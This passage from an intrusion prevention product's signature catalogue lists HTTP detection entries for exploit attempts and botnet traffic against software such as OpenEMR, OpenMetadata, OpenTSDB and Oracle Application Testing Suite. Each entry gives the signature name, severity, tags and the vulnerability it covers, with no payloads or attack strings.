Tags: Any Operating System, Any Hardware, Novell ZENworks Mobile Management, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Mobile Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Mobile Management, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution
Description:
Back to top

HTTP_CRL-Nph-Maillist

About this situation: Exploit attempt against vulnerable script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, nph-maillist.pl, CVE2001, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-Cgi-Nph-Maillist
Description:
Back to top

HTTP_CRL-NSClient++-ExternalScripts-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in NSClient++ detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, NSClient++, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: NSClient++-ExternalScripts-Authenticated-RCE
Description:
Back to top

HTTP_CRL-Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in NUUO NVRmini devices detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NUUO NVRmini, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Nuxeo-Nuxeounknownresource-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in Nuxeo Nuxeo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nuxeo, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Nuxeo-Nuxeounknownresource-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-Obad-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Client Stream
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-895-5242
Vulnerability: Android.Backdoor.Obad.a-Botnet
Description:
Back to top

HTTP_CRL-Obad.a-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Android.Backdoor.Obad.a-Botnet
Description:
Back to top

HTTP_CRL-ocPortal-Arbitrary-File-Inclusion-Vulnerability

About this situation: An attempt to exploit a vulnerability in ocPortal was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ocPortal, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1607-5242
Vulnerability: ocPortal-Arbitrary-File-Inclusion
Description:
Back to top

HTTP_CRL-OCS-Inventory-NG-Commandline.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in OCS Inventory
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OCS Inventory, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1271-5242
Vulnerability: OCS-Inventory-NG-Commandline.php-Command-Injection
Description:
Back to top

HTTP_CRL-Oficla-Traffic

About this situation: Oficla traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Oficla-Malware
Description:
Back to top

HTTP_CRL-OMI-Agent-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Azure OMI Agent detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Open Management Infrastructure, CVE2021, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1388-5242
Vulnerability: OMI-Agent-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Online-Store-Kit-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Online Store Kit detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-OP5-license.php-Remote-Command-Execution

About this situation: An OP5 license.php Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, OP5, CVE2012, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: OP5-license.php-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-OP5-Welcome Remote-Command-Execution

About this situation: An attempt to exploit an OP5 Welcome Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, OP5, CVE2012, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: OP5-Welcome-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Open-Falcon Falcon-Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Open-Falcon Falcon-Plus, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Vulnerability: Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection
Description:
Back to top

HTTP_CRL-Open-Web-Analytics-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Open Web Analytics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Open Web Analytics, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Open-Web-Analytics-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenCATS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenCATS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-OpenDocMan-Cross-Site-Scripting-CVE-2015-5625

About this situation: An attempt to exploit a vulnerability in OpenDocMan was detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, OpenDocMan, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: OpenDocMan-Cross-Site-Scripting-CVE-2015-5625
Description:
Back to top

HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Openemr Development Team Openemr detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Openemr-Admin-Edit_Globals-Application-Title-Stored-XSS
Description:
Back to top

HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting-2

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Openemr-Admin-Edit_Globals-Application-Title-Stored-XSS
Description:
Back to top

HTTP_CRL-Openemr-Calendar-Search-SQL-Injection

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1456-5242
Last changed: sgpkg-ips-1456-5242
Vulnerability: Openemr-Calendar-Search-SQL-Injection
Description:
Back to top

HTTP_CRL-Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1273-5242
Vulnerability: Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Vulnerability: Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-Download_template.php-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1259-5242
Last changed: sgpkg-ips-1259-5242
Vulnerability: Openemr-Download_template.php-Directory-Traversal
Description:
Back to top

HTTP_CRL-Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-Globals.php-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1383-5242
Vulnerability: Openemr-Globals.php-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Openemr-New.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1215-5242
Vulnerability: Openemr-New.php-Command-Injection
Description:
Back to top

HTTP_CRL-Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, OpenEMR Development Team OpenEMR, CVE2022, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Vulnerability: Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-Patient_Report-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Openemr-Patient_Report-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-Phpgacl-Edit_group.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Vulnerability: Openemr-Phpgacl-Edit_group.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Vulnerability: Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Vulnerability: Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-OpenFire-Server-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in OpenFire Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1607-5242
Description:
Back to top

HTTP_CRL-OpenMediaVault-Cron-Remote-Command-Execution

About this situation: OpenMediaVault Cron Remote Command Execution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMediaVault, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: OpenMediaVault-Cron-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Openmetadata-Authentication-Bypass-CVE-2024-28255

About this situation: An attempt to exploit a vulnerability in OpenMetadata detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMetadata, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Openmetadata-Authentication-Bypass-CVE-2024-28255
Description:
Back to top

HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255

About this situation: An attempt to exploit a vulnerability in OpenMetadata detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMetadata, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: Openmetadata-Authentication-Bypass-CVE-2024-28255
Openmetadata-Spel-Injection-CVE-2024-28847
Openmetadata-Spel-Injection-CVE-2024-28253
Openmetadata-Spel-Injection-CVE-2024-28848
Openmetadata-Spel-Injection-CVE-2024-28254
Description:
Back to top

HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847

About this situation: An attempt to exploit a vulnerability in OpenMetadata detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMetadata, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1719-5242
Vulnerability: Openmetadata-Spel-Injection-CVE-2024-28847
Openmetadata-Spel-Injection-CVE-2024-28253
Openmetadata-Spel-Injection-CVE-2024-28848
Openmetadata-Spel-Injection-CVE-2024-28254
Description:
Back to top

HTTP_CRL-Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenMRS Reference Application detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMRS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1254-5242
Vulnerability: Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-OpenNetAdmin-Ping-Command-Injection

About this situation: An attempt to exploit a vulnerability in OpenNetAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, OpenNetAdmin, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1226-5242
Vulnerability: OpenNetAdmin-Ping-Command-Injection
Description:
Back to top

HTTP_CRL-OpenNMS-XML-External-Entity-Injection

About this situation: An attempt to exploit an OpenNMS XML External Entity Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenNMS, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: OpenNMS-XML-External-Entity-Injection
Description:
Back to top

HTTP_CRL-OpenProject-Cross-Site-Scripting-CVE-2019-17092

About this situation: An attempt to exploit a vulnerability in OpenProject
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenProject, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Vulnerability: OpenProject-Cross-Site-Scripting-CVE-2019-17092
Description:
Back to top

HTTP_CRL-OpenSIS-Modname-Code-Execution

About this situation: An attempt to exploit an OpenSIS Modname Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSIS, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: OpenSIS-Modname-Code-Execution
Description:
Back to top

HTTP_CRL-OpenSIS-Unauthenticated-PHP-Code-Execution

About this situation: An attempt to exploit a vulnerability in openSIS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSIS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: OpenSIS-Unauthenticated-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-OpenSSH-Backdoor-C2-Traffic

About this situation: OpenSSH backdoor C2 traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Potential Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: OpenSSH-Backdoor-C2-Traffic
Description:
Back to top

HTTP_CRL-OpenTSDB-2.4.0-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in OpenTSDB detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, OpenTSDB, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1828-5242
Vulnerability: OpenTSDB-2.4.0-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-OpenTSDB-2.4.1-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in OpenTSDB detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, OpenTSDB, CVE2023, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1828-5242
Vulnerability: OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-36812
OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-25826
Description:
Back to top

HTTP_CRL-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution

About this situation: Detects HTTP requests trying to exploit HP OpenView Network Node Manager via shell metacharacters in argument to 'node'
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: HTTP-HP-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution
Description:
Back to top

HTTP_CRL-OpenX-Flowplayer-Backdoor-Remote-Code-Execution

About this situation: OpenX flowplayer Backdoor Remote Code Execution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, OpenX, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: OpenX-Flowplayer-Backdoor-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Opmantek-Open-Audit-M_discoveries.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Opmantek Open-AudIT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Opmantek Open-AudIT, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Opmantek-Open-Audit-M_discoveries.php-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-10g-Isqlplus-Service-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle 10g detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server 10g, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Oracle-10g-Isqlplus-Service-Heap-Overflow
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Vulnerability: Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: Oracle-Application-Testing-Suite-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
